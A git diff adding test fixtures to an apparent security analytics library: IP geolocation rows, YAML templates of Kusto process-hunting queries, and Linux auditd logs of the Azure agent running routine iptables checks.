+80,13.86.124.191,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,13.86.124.191
+81,13.89.187.212,{},geolocation,US,United States,Iowa,Des Moines,-93.6112,41.6006,13.89.187.212
+82,20.41.41.23,{},geolocation,US,United States,Virginia,Boydton,-78.375,36.6534,20.41.41.23
+83,52.179.17.38,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,52.179.17.38
+84,157.55.134.142,{},geolocation,US,United States,Virginia,Washington,-78.1539,38.7095,157.55.134.142
+85,172.217.15.110,{},geolocation,US,United States,,,-97.822,37.751,172.217.15.110
+86,40.91.75.5,{},geolocation,US,United States,Washington,,-122.3314,47.6092,40.91.75.5
diff --git a/tests/testdata/kusto/kusto_queries_mstic_app.yaml b/tests/testdata/kusto/kusto_queries_mstic_app.yaml
new file mode 100644
index 000000000..2e1701838
--- /dev/null
+++ b/tests/testdata/kusto/kusto_queries_mstic_app.yaml
@@ -0,0 +1,131 @@
+metadata:
+  version: 1
+  description: Kusto Queries
+  data_environments: [Kusto]
+  data_families: [AppAuthCluster.scrubbeddata]
+  cluster: https://msticapp.kusto.windows.net
+  tags: ["user"]
+defaults:
+  parameters:
+    table:
+      description: Table name
+      type: str
+      default: "DeviceProcessEvents"
+    start:
+      description: Query start time
+      type: datetime
+      default: -30
+    end:
+      description: Query end time
+      type: datetime
+      default: 0
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ""
+sources:
+  list_host_processes:
+    description: Lists all process creations for a host
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where DeviceName has "{host_name}"
+        {add_query_items}'
+      uri: None
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+  process_creations:
+    description: Lists all processes created by name or hash
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where FileName contains "{process_identifier}" or SHA1 has "{process_identifier}" or SHA256 has "{process_identifier}" or MD5 has "{process_identifier}"
+        {add_query_items}'
+    parameters:
+      process_identifier:
+        description: Identifier for the process, filename, or hash
+        type: str
+  process_paths:
+    description: Lists all processes created from a path
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where FileName contains "{file_path}"
+        {add_query_items}'
+    parameters:
+      file_path:
+        description: full or partial path
+        type: str
+  process_cmd_line:
+    description: Lists all processes with a command line containing a string
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
+  query_new_alias:
+    description: Lists all processes with a command line containing a string
+    metadata:
+      data_families: [AppAuthClustera.scrubbeddata]
+      cluster: https://msticapp.kusto.windows.net
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
+  bad_query_fam_no_dot:
+    description: Lists all processes with a command line containing a string
+    metadata:
+      data_families: [scrubbeddata]
+      cluster: https://msticapp.kusto.windows.net
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
+  bad_query_no_cluster:
+    description: Lists all processes with a command line containing a string
+    metadata:
+      data_families: [AppAuthCluster.scrubbeddata]
+      cluster:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
diff --git a/tests/testdata/kusto/kusto_queries_mstic_ia.yaml b/tests/testdata/kusto/kusto_queries_mstic_ia.yaml
new file mode 100644
index 000000000..8b2dae600
--- /dev/null
+++ b/tests/testdata/kusto/kusto_queries_mstic_ia.yaml
@@ -0,0 +1,131 @@
+metadata:
+  version: 1
+  description: Kusto Queries
+  data_environments: [Kusto]
+  data_families: [IntegAuthCluster.scrubbeddata]
+  cluster: https://mstic.kusto.windows.net
+  tags: ["user"]
+defaults:
+  parameters:
+    table:
+      description: Table name
+      type: str
+      default: "DeviceProcessEvents"
+    start:
+      description: Query start time
+      type: datetime
+      default: -30
+    end:
+      description: Query end time
+      type: datetime
+      default: 0
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ""
+sources:
+  list_host_processes:
+    description: Lists all process creations for a host
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where DeviceName has "{host_name}"
+        {add_query_items}'
+      uri: None
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+  process_creations:
+    description: Lists all processes created by name or hash
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where FileName contains "{process_identifier}" or SHA1 has "{process_identifier}" or SHA256 has "{process_identifier}" or MD5 has "{process_identifier}"
+        {add_query_items}'
+    parameters:
+      process_identifier:
+        description: Identifier for the process, filename, or hash
+        type: str
+  process_paths:
+    description: Lists all processes created from a path
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where FileName contains "{file_path}"
+        {add_query_items}'
+    parameters:
+      file_path:
+        description: full or partial path
+        type: str
+  process_cmd_line:
+    description: Lists all processes with a command line containing a string
+    metadata:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
+  query_new_alias:
+    description: Lists all processes with a command line containing a string
+    metadata:
+      data_families: [IntegAuthCluster2.scrubbeddata]
+      cluster: https://mstic.kusto.windows.net
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
+  bad_query_fam_no_dot:
+    description: Lists all processes with a command line containing a string
+    metadata:
+      data_families: [scrubbeddata]
+      cluster: https://mstic.kusto.windows.net
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
+  bad_query_no_cluster:
+    description: Lists all processes with a command line containing a string
+    metadata:
+      data_families: [IntegAuthCluster.scrubbeddata]
+      cluster:
+    args:
+      query: '
+        {table}
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where ProcessCommandLine contains "{cmd_line}"
+        {add_query_items}'
+    parameters:
+      cmd_line:
+        description: Command line artifact to search for
+        type: str
diff --git a/tests/testdata/linux_events.csv b/tests/testdata/linux_events.csv
new file mode 100644
index 000000000..a198943c7
--- /dev/null
+++ b/tests/testdata/linux_events.csv
@@ -0,0 +1,101 @@
+,TenantId,TimeGenerated,Computer,mssg_id,AuditdMessage
+0,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505627.301:9077922,"[{'USER_END': ['pid=28056', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:session_close"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+1,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505627.301:9077923,"[{'CRED_DISP': ['pid=28056', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:setcred"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+2,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505632.285:9077924,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f396d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28066', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+3,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505632.289:9077925,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55a693b8bbb8', 'a1=55a693b8bb70', 'a2=55a693b8bb88', 'a3=7f7f05d1b810', 'items=2', 'ppid=28066', 'pid=28067', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+4,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505632.293:9077926,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f396d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28068', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+5,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505632.293:9077927,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5650386da7e0', 'a1=5650386da728', 'a2=5650386da7b0', 'a3=7fbb0edc9810', 'items=2', 'ppid=28068', 'pid=28069', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+6,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505637.305:9077928,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e2c870', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28070', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+7,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505637.305:9077929,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55b76ef60bb8', 'a1=55b76ef60b70', 'a2=55b76ef60b88', 'a3=7f0e8609d810', 'items=2', 'ppid=28070', 'pid=28071', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+8,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505637.309:9077930,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e2c870', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28072', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+9,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505637.309:9077931,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55d3f6a4a7e0', 'a1=55d3f6a4a728', 'a2=55d3f6a4a7b0', 'a3=7fd0863a8810', 'items=2', 'ppid=28072', 'pid=28073', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+10,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505642.316:9077932,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f9e690', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28079', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+11,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505642.320:9077933,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=565174c02bb8', 'a1=565174c02b70', 'a2=565174c02b88', 'a3=7f7019286810', 'items=2', 'ppid=28079', 'pid=28080', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+12,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505642.328:9077934,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f9e690', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28081', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+13,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505642.328:9077935,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=556f99c677e0', 'a1=556f99c67728', 'a2=556f99c677b0', 'a3=7f83c622c810', 'items=2', 'ppid=28081', 'pid=28082', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+14,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505647.336:9077936,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174bf8f2d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28084', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 